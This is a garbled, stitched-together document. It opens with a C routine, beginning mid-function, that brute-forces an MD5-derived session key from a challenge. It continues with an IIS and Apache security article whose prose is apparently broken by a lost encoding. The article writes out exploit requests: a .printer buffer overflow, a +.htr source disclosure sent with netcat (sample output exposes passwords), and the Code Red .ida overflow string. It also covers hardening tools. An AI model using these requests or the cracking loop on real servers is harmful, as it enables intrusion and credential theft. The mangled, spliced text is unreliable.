unsigned char key[16];
char
*p;
unsigned long sec, usec, pid, ppid;
unsigned char eblock[64], cblock[64];
unsigned char *o1;
int
o2;
if (argc == 5 && strlen(argv[4]) >= 47) {
sec = strtol(argv[1], (char **) 0, 0);
pid = strtol(argv[2], (char **) 0, 0);
ppid = strtol(argv[3], (char **) 0, 0);
p = argv[4];
for (i=0; i<16; i++) {
true_challenge[i] = strtol(p, &p, 16);
p++;
}
}
else
{
printf("Usage: %s sec pid ppid "
"00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n",
argv[0]);
exit(1);
}
/* Set up eblock and cblock */
for(i=0;i<64;++i) eblock[i]=0;
eblock[8] = 0x80;
eblock[56] = 0x40;
for(i=0;i<64;++i) cblock[i]=0;
cblock[16] = 0x80;
cblock[56] = 0x80;
((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));
for (usec=0; usec < (1<<20); usec++) {
((int *)eblock)[0] = mklcpr(usec);
MD5Transform1(cblock, eblock);
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
MD5Transform1(maybe_challenge, cblock);
if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) {
printf("Found it! The key is ");
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
MD5Transform1(key, cblock);
for (i=0; i<0x10; i++)
printf("%2.2X ", (unsigned char) key[i]);
printf("\n");
printf("usec = %lu\n", usec);
exit(0);
}
}
printf("Not found.\n");
exit(1);
}
Microsoft internet information server
(IIS)
T ,
)
O)
6)
2 0,<
"
6b. 2
O) ? •Y
B
5/
1! M,6
-,< ;!
256)
YGX$?
#
B)
)h 4
2
+' , ,F
n & n 9"
IIS )
(
<
6*
a
I
,
B ,
)
6=GX \
Y,
YGX
6 Y1
IIS
#
G ) 6, i X
0,E N T)
E
785/ 2
)
P1
# (DLL) #
B
6
6 *
) 4
,
"
! 5E
H
)
6$;.P 2
@ !
6 Y1
£ B
! B
5/
-
% G N, #
B
! B
5/…
3 B
! B
5/…
?
IIS
-
P1, -,<
IIS
?
IIS
1Q ?
#<@
- NB
4 6F
6ˆ4 b
-,< K , ,F 7c L.
" -)
"
F$showcode.asp
7
2 `56) , -,< K
0, -,< K
H O) ? • Y
785/ )_MDAC/RDS]-
' &
3
3
2 "
5
-
"
#<@$::$DATA P
<6
7 !89 "
?
0
)
# IIS
4"
56% 1 256 0
6=GX
7
- Y
7
IIS
! 5E 2
inetinfo.exe$
,6*
0, -
% ' b
.prniter,
,
4
% '
E
"
DDL
3
B'2
-
TQ
0 <
6 K
7
B ) 256 ) , 6 v 4
$,
3
IIS "
E
B
5! 7
L3 ,
4
-, < / 9 DDL " $_, <
3
F % '2
0,
bP
- N
4 j 40
N ISAPI
7 B
5! ( E
w
3
PHP)COLdfusion I K6-, "
/7
IIS S L ? "
)
- 1
@ B)
" -
6 B'" $IIS0, 5
),
@0 ,
3
f 0,
% ' $
1 2
3
'j 4 7
5G 2
ISAPI "
- Y
P4
F
'
R4 S @ ^
ISAPI
6
H B
5/
$n 9 2 "
,<
O *
"
6 ' ? 5F
6
@^
F
-, 6 U )
)
)
6%
L * iX
0,
4 ) 7 # 0_URL
6=GX) 78#
)
-, < - )@
o
"
], 5
,
5 7
6
5$
),
6'
-, 6 U )
) i.
)
H ? 5F $ F
6 ) nH
, ,F R4 S @ ^
F)
N
ntdll.dll webDAV
SL IIS )
T#< ) =GX
3
"
F
6h @
I ],
N 0, 5 6 '
-, < SL T L.
"
N
6 ) )
"
?5F
3 - *1 7
_PHP)coldfusion
$ R4 S @ ^
H
$O)
( N (, !0, - 5 - Y
F
F) E
) )
6URLb
6
, N)
#
6,
6DLL
? 5 TG' g]dos \ " 785/ ?# $ IIS 5.0
3 I
g
"
l '=GX "
8Q 0 )@
C
_SL ]
7 L
? 56 B )
- Y $O)
2 56,
-,< I
N "$ 1
) S L " U 4 IISS
R 4S
6
L C85! ) - PS L
B'\ 2 " " E
+ E'IIS 6 )
)‚
code red2 ) code red0,
_U )
k
" ,G , 5
-,< ;!
- Y Z
% .6
3 M ,6
)e
? •Y
B3
3
4
RN $p ISAPI
-,<
,F ) W 3 7 B
5! (&B $ ISAPI 6 B'"
)
O)
V < )_server side includes]SSI$_active server pages]ASP
k
?
P1]
3 ], <
7 ) X
")
F
",
)
&
, # 4 (,! % 1
, ,
& IIS
1Q0_ N T L.
,<
T L.
1
-handel
internet server application programming interface 2
<R
1
,
n 9 " 785/
1
) )
N
,
GH )
1QZ&F
P
10
I, 6, -" F
-,< ?
0, -
@-
- Y Z
< ISAPI
0 <
ISAPI DLL
0, <
'
&
IIS O)
b
- 4 '
( E ISAPI )
785/$ <
6)
&
"
4
pqqp T
785/ 2
6=GX "
" j* 2
N
# pqqp T
2
'
0
&
% )@
=
P 4
HTTP , @
-
1
@
b
ISAPI DLL )
^
?
eEye
n 9" k
‹pq C
P
0
@
1Q
F
' &
3
"
#
Digital security$pqqw
ISAPI
B'
% # ) 4_c:\winnt\system32\msw3prt.dll] B'
k
#P
< 6 N4
"T Q
-,< "
0 printer
P 4 _IPP]s
#
3)
h
0, -
(8! $,
0,
) ) pqqw T
Ÿ
0
6 B'?)
"
60, , < ? ) nimda)codered
)
ASP 7 .Y
0, <
0T
85/ 2
%
6ISAPI DLL
O) ) -,<
@"
<-
=B*
'
,@
'printer
F
ISAPI
0 ',6 3 lY 2
IPP0,
6 PF
H)
Ÿ
HOST
3
6
2
420[buffer] 5 H
H
GET/NUL.printer HTTP/1.0
HOST:[buffer]
"), )
<
<
<&
;! )_information],
=GX 2
;! ,
IIS)
0 <
P
10,
'
F- )
" , - e 'j 4 )
<
;! -
IIS
1
)
7
1/
1P 7 L
;! $ <
" , - - ) IIS # N60_ < B
H
B
G
1/
)
,
2
pqqq
O)
,4
‚,6
H) # &F ]
3
)
IIS
. [ ˆ6
)
) ,6 Ÿ IIS
3
'L
2' R
6:3
internet printing protocol
ISAPI DLL
5 printer '
&
b
)@ 6 3 +
F) ISAPI DLL
j 5
!89 ?
,
,<
F) ?
# " %P
H
" ,<
l '
bB
g +P
% '2 <
" - Y
,
5<
+.htr
3
F) ISAPI DLL
@j 5
,<
,
-
j 5 -
3
)
,
F"
G
F 0,
,6
=GX
$ < F IIS b
<N ISM.DLL
htr.txt (
F
% '+
ISM.DLL
-,
,<
'0
! 1/
7
<
"
3 TQ +.htr
'"
?@ ?
56
-, @
+
" E$
"
U)
,<
Ÿ
1Q 5 H 2
Q
/P " • & -
;! ) ,
5<
'
3
=GX -
?@
G0 , 6
1Q 2 0 <
Y bB
g
'
<
7 G:H$5 ) 4IIS
3
"
"
ISAPI DLL
<) ) N F
<
6-
_Source Disclosure]+
% '
ISAPI DLL
% '.htr,
40 ,
,
Y
E
-
2 " NetCat
Ÿ
0
N
GET/sitel/global.asa+.htr HTTP/1.0
[CLRF]
[CLRF]
5<
-,<
H
R4 S @ )
netcat B )
9P " - Y
a,
-,6
f ,
c:\>nc -vv www.victim.com 80<htr.txt
www.victim [10.0.0.10]80(http)open
200 OK
HTTP/1.0
server:microsoft-IIS/5.0
date:thu,25 jan 2001 00:50:17 GMT
<!--filename=global.asa-->("profiles_connectstring")
"DNS=profile;UID=company_user;password=secret"
("DB_connectstring")
="DSN=db;UID=company_user;password=secret"
="DSN=phf;UID=sa;pwd="
("PHFconectstring")
("sitesearchconnectionstring")="DSN=sitesearch;UID=company_user;pas
sword=simple"
("connectionstring")="DSN=company;UID=company_user;password=gu
essme"
("email_pwd")="sendaemon"
="LDAP://DIRECTORY.COMPANY.COM:389"
("ldapserver")
("LDAPUSERLD")="CN=DIRECTORY ADMIN"
("LDAPPWD")="SLAPDME"
?
$GLOPA.ASA% ' ,
T 5G 7
5<0
-,< S#
)
-,
&
,1
7 5B "
6P<
, ,< F
ISAPI DLL
R4 S @ "
N 4)
0
<
T/0,
3
@ 56-
- Y
&
,
3
6ISAPI DLL
,<
) ) 7 !89
7
;!
F) B
,
2 560
<
;!
@ MR /
0,
MR /
),
B
!$
-
'X
?
GF'
B
6
E
)
? DLL
6-,
<N MR/
7
+.HTR +
"
-,6
Ÿ
= B* A) 2 ,
6 3 ;. %LY
j 5
7 !89 ,
‚
ISAPI
: 56
+.HTR ? )&' 0 < 5 -
-,< ?@ ? j 5 ;! ?@ 1P
H GLOBAL.ASA % '
-,6
6 *
') PRINTER
'
@ MR / (,! ) , < TG' g 5
6 D l '-, ,! 78#
, <
^
I'/ IIS
)
< <N
DLL
@
F
0,
- 56DLL
I'.
@ )
6% ' 6 4
B'
<
15 / 785/ "
?E ISAPI DLL0 E
+
GZE
#; $E7W
$E
A? +!=W
E$E % 0 +E
=
* !#+
IIS?! j;R !5 $@
?@g C 8 e
*g
$ >>
QR g7=
<< = ?
2
)
<N ; !
,
6% ',
B$,
a,
,
-,6
T G' g
COMPUTER ) $, <
?@ 5<
"
6DLL ?
4h
U $,
DLL
PROPERTIES U
O*
)
•MASTER PROPERTIES
•WWW SERVICE
•EDIT
•PROPERTIES OF THE DEFAULT WEB SITE
•HOME DIRECTORY
•APPLICATION SETTING
•CONFIGURATION
•APP MAPPINGS
?@ ) PRINTER ,
4
B'
MSW3PRT.DLL % '$
%#<0,
N
<N
6ISAPI DLL
@
F) ISS
N56
6DLL - 56
@"
MR/
<
"
7"'
<N
R4 S @
>G " T),F
, <
0
L
" %# < ,
-
?
P
1
^
<
0 &'( )
ACTIVE
SERVER
.ASP
BUFFER
PAGES
OVERFLOWS,MS02-
FUNCTIONALITY
018
WEB-BASED
.HTR +.HTR
PASSWORD RESET
SOURCE
DISCLOSURE,MS01004
INTERNET
.IDC
6
DATABASE
?
#
<@
Q193689$O)
CONNECTOR
SERVER-SIDE .STM,SHTM,SHTM1
'
INCLUDE
&
MS01-044$ )
INTERNET
.PRINTER -
'
PRINTER
&
MS01-023 )
INDEX SERVER
.IDA,IDQ -
'
&
MS01-033$ )
FRONTPAGE UNINSTALL FPSE
SERVER
EXTENSION
REMOTE
RAD SUPPORT MS01-
IUSR
'
&
RAD
035
SUPPORT
' ) # HOTFIX )PATCH
ISAPI DLL
+'
,
&
N =B*
<N
6
6 g8 0
F)
MS01-026,
-
-
R4 S @
1
),<
6PATCH " ,
-,Y
-, @
6-,
5< #
@ 78#
ISAPI DLL
, -, < ,
)
SL B )
6%
4 MR/
ISAPI DLL 78#
P
9
6S
%
B
5F " 0
F) 78#
N +'
' ) #
‹
R4 S @ () , 7
B)
@]
4
,N
-
%/
N
<
') #
A &
microsoft security bulletine
5<
6 g8 2 " ( ,
6 _, <
0,
,4
' ) # $, ,F 6PATCH
0
-
pqqwT
R4 S @ ?@
")
_HFNETCHK.EXE]
Š
j 4
HFNETCHK # " % P
H P
10, 6
-, < -
A &
' ) # -
6? ,
6
?# 0, K5 SL
' ) # b
-,< ( E
-, < K
6
<
"
(N
"
")
0,6
(E$
-
'
("c$
- Y IIS - 5 PHP
P ),
6
" #
GF
F
l '7c L.
? @ ) - @ T L.
) UPDAE WINDOWS
6U )
(N
$ ' ) #
6
-, < 'X 7c L.
g] -,< 'X 7c L.
2 ),
\) <
-, < 'X
6
)
HOTFIX i:
3 7 !89 , # j 4
-, < K PATCH 2 3@
:
5 HFNETCHK
6
XML B
X !
P
1
#P< HOTFIX -,
K
) PER1IIS,COULDDUSION I
"
1
6 #P< "
6PATCH 2 3@ -
- N4"
PATCH ,
I
5< IIS )
) SERVICE PACK A & ) ,
b
g8 2 p• -, 6 ?
6PATCH % <$
bP ) ("c
? ,
IIS
("c ) - P ' ) #
0, 6 ( E C
IIS
3
_ ') #
URLSCAN,IISLOCHDOWN " - Y
ISSLOCKDOWN WIZARD (
, #4
0,<
)“CUSTOM’
3 &
1/
IISS L
d*
6 '$ IIS SL
a
T G'
g
0
ISS
$
l '
^ P
6U )
5< -, 6 U )
&
d*
F
3
:
' ) # $pqqw T
j
$ ?@
I
7
"7
B, 6
"
3)
: 56)
%
4
IIS
“EXPERT“
u?
u T5! ?# $ S
-" Fa
2, 0 5
)
•
P
1_NNTP,SMTP,FTP,WWW],
5
network hotfix checker
5< I
- 5 -, < K
b
C 5!
6
5 MR/ )_,<
T) ,
5
7
< " $O)
.
6 ISAPI
•
?@
F)
+ 2 `56) IIS
Z F " O) -, 6 U )
0_TFTP.EXE )CMD.EXE I ]
g
%
N ]WEBDAV ? 5 T G' ga 'X
b. #
EXTENSIONS ?
- Y ?5F
gaSCRIPT
5 T G'
MAPS•
_PRINTER)ISM)IDQ)HTRa I ]
@ 2' R ) IIS
CP
-
-, < -
1 c
6
' B
H" %
6
3
5 ‚,
>G
P
10, <
? 5
% !
N
5
E
6 PF -
) 4
3 7 L*
"
IIS W
L*
#4
#B
5! )
O) -, 6 U )
) %
9
?
B
F
5 ) ,<
-
& aURLSCAN•
B'
ˆ 6 6hotfix) SERVICE PACKS L -
,
# $,
,
6 "
@
ˆ6
)
IISLOCKDOWN0,
&
6 PF " )
S L
) "
"
,
2
,F 7
# ?@
6& ? "
URLSCAN$
-,
5 (E
, "), )
IISLOCKDOWN
#4
3
IISLOCKDOWN0
0,< %'g N
@"
@
I'. ˆ 62 `56$, 6
) L*
) X
? 5
B3
URLSCAN
L ,
P
1
5<0 < SL _IISLOCK.EXE] IISLOCKDOWN
a, 6 ( E
C:\>IISLOCK.EXE/Q/C/T:C:\LOCKDOWN_FILES
IISLOCKDOWN n 9 " URLSCAN SL
,<
N A)
0 < SL ,
,
,
'
-,
ISAPI
3
5L ) ,<
37
URLSCAN.INI)URLSCAN.DLL % ') % < URLSCAN
,<
,<
P
1
B' URLSCAN.DLL0
IIS # " % PH ) ,
,
% 5! % K/
H$SL
,
?56
H IIS B
F
)
# 4 % ' URLSCAN.INI ) , % B
.
' R4 URLSCAN ISAPI b
, PHTTP
3
@,
\
$,
% ' P
1]0 <
- 3•SL
URLSCAN.LOG (
?56
3•URLSCAN.MMDDYY.LOG(
-
2 #5 A &
HTTP 404 OBJECT NOT v 4 ,
HTTP
4
P
[
FOUND
'
5 URLSCAN , # 4
3
6
URLSCAN_ <
3
0,
"
% '
?
a 'R ,<
_- g ) HEAD)POST)GET,
7 5B ]
-,<
,
5 H2
3
3
, , 6 3 ,G ;/P ] V #
<) h
…
4h
…
6URL h
…
B',
-,< &
_,<
6URL
NON-ASCII
6
"
3
: X
nP9 ,
6
>/ h
…
3S
>/ h
…
6, @
>/ h
…
W L*
F) d *
6
4
2 " (,
6
0, < <R URLLSCAN.INI % '
6)
<
&
IIS ?,< F ? "
,
0 < " , - - ) IIS
<
b' URLSCAN.INIa #
T5!
" b'?@
#P< 6"
,
7
"
B') ,
-
B)
N
" ?)
5 ?
, 4 bB
4
2 ,@
#6
,
)
F
?
T/0,
)
F) 3 -,
B' ?
,63
B $
H
5
2 )
0,
•
!"
" #$ %
-
0
H % PH "
TCP SYS
&
4
%
7
) )
z 3
%
j @
N$, 5
)$
<
* +!
- 4
& 21
)
H
@ &F
b'
' (!
"
)
5 0% F O) )
?@ -
B'
26• c 5G
6 F) 3
%3 " 7 9P
-,
u
(E
^P
#P<
6
3
6
,
< 5 V B, @
], <
%3
\)
<
6
?)
3
,
* 4
,
E
2
?# 2
P
1
)
)
_€ Y
+ H) P[ )
V ,
-,
•Y
? )"
H)$
)0
\X
&
2 ?, 5 ' B
IDA/IDQ ISAPI 6,
4 )
6-,
<N
NIMDA)CODE RED (
2 0,
% )
) pqqw T
+ H) P
[ % ',
,
"
3)
- 1
@
"
),
'
)
#
"
B
5/
' &
f
2
, ,F
, 1 ;!
? < 3 6h) ) , 56
&
2 "
R4 S @
. CODE RED (
P
< B
3,
<) " N
ISAPI DLL
TP $,<
-,
6)
,
"
pqqp
-,< - 1
@‘
‘
6)
GET/DEFAULT .IDA?NNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNN%0U6858%0UBD3%0U4570%0U7801%0UU9090%0
U6858%0UCBD3%0U78%0U455%0U00000%0U00=A7
0,
E - 1
@
\X
%SYSTEM%\NOTWORM
2 -, 6 ?
- 1
@ CODE RED (
2 `560, <
,4
u( 2
,<
7# 2
N4
@V#
3
<
0, 6,
9
2 -, 6 ? $
-
+ H) P
[ 6% ' 5I 7
0, <
; +!0x90 0x90 %u9090 # :
,<
% ' ROOT.EXE % ' >/
- 1
@
6% '2 `56),
560,
>/ TQ ? !
X /T /
"), ) % < 7
NIMDA(
,<
)
% ' ,G 2 `56NIMDA)CODE RED
6
-
./0
(
7
,
)
H?
,
"
,
8
+
5 5<
,
+1 2 " 34 5
6
nop " @A x86 =
U4
4
78
> ?
8
6-
"( 7
<
-source code
#' , <
,
:B
g e '2 0
N
,
6U
a
"
SQL 7
,
‚, <
"
5 5 <+
% 5< 6:3 2
B)
-
-N4
'%#
IIS
6, ?,
5! "
^P
1#< 2
4
.INC
@?
0
!89$% 5 h @ ,
T5!
,<
6,
(
?
4
)
j 4
I 7
R4 S @ ?
2
" %P
H U 40 , < - @ ,
R4 S @ ) , <
-
85/ 2
& 7 5B…
INCLUDE
B'" - Y …
#
.
#
)
?)
0,
0
6 3 ;. %LY
<) 2
9
"
R4 S @ ^
@ +'
F
6N 4
,
)-
,4
N -
#
3
,G ;/P
HTTP GET
R4 S @
OK(/DEFAULT.ASP
/DEFAULT.ASP+.HTR
+.HTR SOURCE DISCLOSURE
ERROR
PERFORMING
MS01-004
/FILE.STM,.SHTM,.SHTM1
WEB
QUERY
500
j 4
2 ? N
SOURCE MUST BE PRESENT
500
# , <
R4 S @ v 4
j 4% H
200
I'.
3$, 6 ( E 5< B
!
( ,H
-
3 #P< I 7
?@ " ?5F
?
7 .X …
?5 3
,
"
#
7 L
u2 & N
Y* 7 !89
6 <…
< ASP
00 ) & 7 5B$
,
S#
2<) ) iX ) ?
GLOBAL.ASA % ' 2<) ) .ASP,
`@
H U ˆ6,
>G ,
0, <
)
d*
INTERNAL
ERROR;HTML
ERROR IN WEB
SERVER
DIRECTORY
PATH
DISCLOSURE ,Q193689
/NULL .PRINTER
.PRINTER
CONTAINS
BUFFER
OVERFLOW ,MS01-023
PRINTER
INSTALL
200
OK;HTML
CONTAINS
/NULL.IDA,IDP
INDEX
SERVER
BUFFER
THE IDQ FILE..COULD NOT
OVERFLOW,MS01-033
BE FOUNS
200
OK;HTML
THE
CONTAINS
FORMAT
/NULL.HTW
WEBHITS
OF
SOURCE
DISCLOSURE>MS00-006
QUERY_STRING IS INVALID
200 OK (/FILE .STM MUST BE
/FILE.STM ,.SHTM,.SHTM1
SERVER
PRESENT)
501 NOT IMPLEMENTED
SIDE
INCLUDES
BUFFER OVERFLOW
/_VTI_BIN/_VTI_AUT/FP30REG.DLL
FRONTPAGE
SERVER
EXTENSION
BUFFER
OVERFLOW,MS01-035
a+
1-HACKING
EXPOSED
–WEB
APPLICATION
,JOEN
SCAMBRAY,MIKE SHEMA
2-WEB
HACKING
–ATTACKS
DEFENSE,STUART
MCCLURE ,SAUMIL SHAH,SHREERAJ SHAH
3-WWW.SRCO.IR
a ,
, < +H ) B
5/
6
ˆ60, -,< F
2
)
') G O)
R4 S @ " 5<
(E
)
6 )
?@ n 9 "
@ )
6
2#5
N
,<
" 7, ,
5 $,< 62 ) #.
)
2
2 `560 <
& 21
)
, LH E
)
6)
B3
0 )
$
6$ O)
()
R4 S @ )
< ;. NETSCAPE) IIS)APACHE? `56
R4 S @ -, 4 2 ,
N N %B
. ) DOS1 785/
6
) 'G U
)
6,
H
@ 15G )
5!
0 "
0
785/
1
,
N
–denial of service
B3 X / T /
,
G1:
$, < , Y -8
j * 2 5<
56 ‚, <
,< 6
N,
)
') )
-
)M
6 #< TP
BPH "
3
,
B3
,
/
? ) "
# TH
APACHE
0
)
5
O) ? , 6 U )
78#
4 $_IIS]
) %K
0
CA-2002-17,CA-2002-]
=GX
-
0
6 ' " 7, ,
-
R4 S @
? `56) <
R4 S @ ^
bP
!
)
h / 6-
_
?@
l '? #
4@0, <
-)8!0
4@ -, 6 U )
- Y "), )
I =B*
R4 S @ ^
B!
? 5 TG' g•
,
] -, 6 U
•
4@
6*
? '- 9*
H U#
1) U#
N
&
)j 5•
•
#
"
R4
) - " -, 6 U )
4@ Z F
PL $ U
6
) 6% '2 3 , - 9*
3)
-)8!
6 „ 1 # $_27
_DOS] U )
e 'j 4 7
F)
& O) -, 6 U )
"$ ?@
6*
&
)
6
"
5
" ,G )
?
4@$
" \ 2 0 5 SL & , 5
0,<
7
3 O) 7 .Y
-
H
,
)
H8! h
?8'
6
,
<R 2
3 F S1H ) ,
9
,
?@
APACHE
1
)„
,<
- *1
"
APACHE
1
)„ 2 56)
Pc
3W 3
e ' ) #17 E
E
3
- *1
ORF 3
.Y ?8' ) , -,6
4@
O) -, 6 U )
& PHP)CGI
R4 S @ ^
F) 7
a
') #
3W 3
# _APACHE]
"
4@ , ) 6T)„
3W 3
S @^
2 1
),
X7:
,
! X
I 2
) 7 .Y
0,
,
3 ,
-,6
7 .Y j 5 ) / 9
y
,
, 6, -" F , P 4 \ X
2
#
0 ,6
H :3 e G
0
)
6
5 ) TQ
c 9 6SLASH B )
) MOD_DIR,MOD_NEGOTIATE
1
)„ ?
"
?
1
6URL 5F
c 9
MOD_AUTOINDEX
? 56
. APACHE
R4 S @ 2 0 ,6 j 5
2001 h
APACHE 1.3.19 *
A8 ) 8
1P
5
1)
B "
URL
0
B3 j
Y0
"
B "
,4 P
B
g O) )
- 4
GH ) , G0, 6 j 5
?@ B )
#
5 APACHE 6 )
,
2
0,
A"
1
2<
?
< Y,
E
#0
& URL
?k7P 0 +5
, #4 B)
%#
1
)„ 0
) e
'j
)$,
.
'
H )
,
APACHE
'&
F)
2 %/
(,
6
)
APACHE #
) $,< , 4
B1 ˆ 60
-, @
"
H APACHE )
1
)„ 2 0,
MR /
# 0,6j 5
0
B
2
MOD_DIR)MOD_AUTOINDEX
47
1,
,
%! U
0,< +' APACHE 1.3.19
2
<+
2#5
1) ,<
8000 "
4
?
? ! $
B
B3 PERL
B
5/ 2 -
"
? 5$
/CGI-BIN///////////////////////////////////////////////////S
7) Y
;!
MARTIN KREAMER
- '4j 4)-
" ,G
<
93
@ APACHE ?
%
, 6, j 5
? "
3 O) )
,
- Y ,
1
)„
N MR/ ) 1
[ROHAN APACHE]$./CONFIGURE –DISABLE-MODULE=DIRDISABLE-MODULE=AUTOINDEX
APACHE
2
,
60
#
', 6 3 B
H" 6
Y
0,
Y1* $ ,
? ?
)
B)
-
"
1Q
2
P10
3
<8 6
6 BH 2 , ,F
,<
1
2001 c F
n 9
, $
APACHE
0
1 " ,<
6 3 P
.
,Y
(5
[ \X
1 ,6 *
-,< e !
'?
B
,
1NETCAT
6
PASSWORD % '? 56c /
"
)
F
3
B
5/ 2 0,< A & BUGTRAQ
0, <
-, @
# 2
O)
,
" KEVINb
,
a,6 j 5
B
APACHE)MULTIVIEWS
R4 S @
)
) X
,4
BRASSCONNON.NET
"
,<
4
, -" F ?), APACHE0
$ )
"
MOD-DIRT)„ MR /
2
F) 3 P
1
,<
6)
6
\ 2
B'
R4 S @ 2 0,<
0,6
MULTIVIEW
'
?
B -
, P
-
) X
g
B'0,
- N`6
, P$, <
V4
?)
2 O) ? , 6 G
5
#
"
H) 6
2 \' 21
)
0 < - 3•
B' 6)$
?
1
0,<
?P 4 * $ 5 ,H
R 4 S @0,<
<
F)
@ ?)
6
% H
6
)
B)
,
,,
h / 6-
MOD_AUTH_*SQL l T
<) STUTTGART- N
?)
_¤]
7
,
2
P
10, <
0
iX
SQL
-" F ?
" RUS-CERT,2001
1
)„
4
2 56)
<
6" / ?@ 2
0
-
6 3 ;. %LY
6" / N N
R N F O)
,
"
9
-, @
3
P
10,
")
0,
,
\X
APACHE ,
!"
U)
R4 S @ d *
- . W L3
a
- Y
2 " U4
0 + &'( )3 45 678
("c 7 !89 S
)
6h @ " ?
$
"
$ %6
MOD_AUTH_*SQL
- Y
", - - )
6 @
I5
4@ O) -, 6
APACHE 1.3.X
h @" ?
SQL
P<
MOD_AUTH_*SQL
• ("c
@
•
:
HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-13
h @" ?
APACHE 2.0.X
HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-20
)
R4 S @ d *
" - Y
0,
<P
0
,Y
- .
I 5 ("c
'7 !89
G X) Z
W
K
a
6h @
("c 7
4
& HTTP://HTTPD.APACHE.ORG/a h @
"2
APACHE O) -, 6 U )
0
L3
$-,< - <
"7
K
4$
"7
"
4@ O) -, 6 U )
4$
DY/ B
<)
DY/ I 5
4@ O) 2 3@ SL " ? 59…w
HTTP://HTTPD.APACHE.ORG/h @ " ?
5 - Y levels PATCH) 6 *
h @" ?
4@
:
GX) 2 3@ "
2
6@
Q CODE SOURCE
6*
…
I5
I
…
0 5 - Y HTTP://WWW.APACHE.ORG/DIST/HTTPD/PATCHES/
? @ " +F ? !
.
I
4@
% !
) X
- <
R4 S @ ^
1
)„ C'
# 2
"
$
.
-
"2
% 5
0, 5
6-"
$ -, 6 U )
O F$
4
0
? G
“/“
- Y
G',
% '
5 -,6
6
c
H,
), . $ l '
(
:
?@
), .
-)8!0
0, @
#
0 5
?@
'#
,6 *
6U )
H CHROOT/HTTPD|
0
LOGIN SESSION
"
5 )
?# $, 5 " g@
3
6- Y Z
6- Y
#
6 '
) -, < -,
F
W L3
$l '
3
6j*
G',
c
2#5 $
) -,< -, 3 'SHELL
",
8Q0,
C
L
3 'SHELL
15 / - Y Z
E /CHROOT
1G') Z F CHROOTED 7
S
2#5 $
$
,
6
F W L3
4@
F) CHROOT " z 3 ) % !
15 /
F
3
<
4@ -, 6 U )
F CHROOT b .
8Q0
C
)
F & 7
I
)
G ; ! CHROOT
CHROOT0
5<
l '-)
B 4$ CHROOT…‹
,E =
,4
2
W 3 ^ P>
F
) ROOT
? G,
F " …s
E " E %H ,/ W 3 6)
- ),. ,E = G ;!
)
#B
5!
4@
0 < ,6 *
/ 0
- Y
- 5 - Y _CA-2002-23] OPENSSL
) ,
) X
4@
2
5 MOD_SSL(CA-2002-27) (
%
I 2,
F
("c :
("c0,
0
)
!PATCHING " ? 59…p
,B
F
S
4@
2, 0 < ,6 *
5 ? G0
5 ? G0
H CHROOT
E
E
15 /
/BIN/SKY
4@ CHROOTING
)
!89
, "
?@
I5
<&
$ CGI,PHP
6
6U)
,G
+P
-
^ P
6 A) 0,<
< TP,
&'(
7,
3
?@
#
P )
"E
6 ,'
1G'\
6%
6
•c
4) 6
S
, ?# $ S
!89
,
)
BH$
@
R3
4@ -, 6 U )
0
'#< ) [
6 '$ -, 6 U )
< $
, 5
'
K LOGGING
0, 5
(E
2, 0 <
I 5 …Š
) -, 6 U )
("c 2
40
6% '
+
K W L3
?#
" W 3 I
) 1
)„
F) CHROOTING
<
B
K
LOGGING 7 B
5!
g
*
("c 7 , 5 ? @ &1
R 4 M :G
H
9P
("c$ O) -, 6 U )
2#5
F %K W L3
I
6 #6
-, 6 U )
W L3
c
("c
P F7 [ ,
b.
F 3
- Y $ 9
1G'W L3
("c 0, 5
B
:
I 5 O) -, 6 U )
? G$ I
)
# 2
:
6% '
7 L
g
'
)
F 7 !89
a,< ,6 3 6 '? @
a 5 - Y
"+
" ,
•c 7) Y
h @ " APACHE
6
'
)
<@
I5
1.3.X
…
< HTTP://HTTPD.APACHE.ORG/DOCS/LOGS.HTML
APACHE
HTTP://HTTPD.APACHE.ORG/DOCS2.0/LOGS.HTML2.0.X
- Y
0 <
•c
P
) F
6% '
.
2#5 -, @ j 4 ^ <
) CGI,PHP "
6 „ 1#
&1@ ? j &' I 5 ?
•c0 5 POST,GET
^
MOD_SECURITY n 9 " ,
6•c
F
#
)
)
)Y
l ' GX)0,<P '
,, $
- Y
#
P
[ ( ,H $
=GX
" - Y Z
POST ) GET
bP
7 B
5! ? 5
0
R4 7
_DETECTIOMN INTRUDER] 2 5/& d *
l'
0, 5
N 4
K
F
O)
S
W L3
j< 4
" $MODSECURITY0, 5
U)
MODSECURITY
)
("c
6
<
6 'O)
N 4 ) ,<
O) -, 6 U )
6
^P
- 56
F
0, 5
5/
"
4@ -, 6
-HTTP://WWW.MODSECURITY.ORG/
•-HTTP://WWW.SECURITYFOCUS/17064.152.44.126%20152.44.12
6
) SSI,CGI,PHP…•
#
a
,F
) X #
N ], K5 TG' g
4
#
I
,!
T G' g
2
<
F) ? @
:
SERVER SIDE INCLUDES
",
3
:
) SSI,CGI,PHP…
6? "
_,<
Z
"
6,
F ;! ) ,
6 '-, 6 U )
SSI…
" - Y
0, K5
) SSI,CGI,PHP "
#
6? "
#
F ? # $SUEXEC0 < - Y SUEXEC "
6 ' APACHE USER ID
H
^
, 5
6 '
USER ID
, 6 3 MR /$ ? 5F
7
7, , S
b
, < ("c j
SETUPID ROOT
,
4@ .
. CGI)SSI
L 3 CGI)SSI
) 6 @
3 <) S
SUEXEC " - Y )
/ 0, 5
6
F
3 '
6
F)
, # 4 (,!
#B
5! - .
)
6- Y/ ")
<@
- Y
;!
I ) :
a 5 - Y
a <
- Y
6
SUEXEC " -,Y 0, <
(
0,< ,6 3 N
h @" ?
- Y
2 , 0, < O ) -, 6 U )
-, < <
P
- 5
?# 2 SUEXEC
4@ ?
…
$
USER ID
%
P 7) Y USER ID
2 < ? # ) j6
) X #
" h @ " APACHE 1.3.X
3
2
"
6
…
HTTP://HTTPD.APACHE.ORG/DOCS/SUEXEC.HTML
a <
" h @ " APACHE 2.0.X
- Y
…
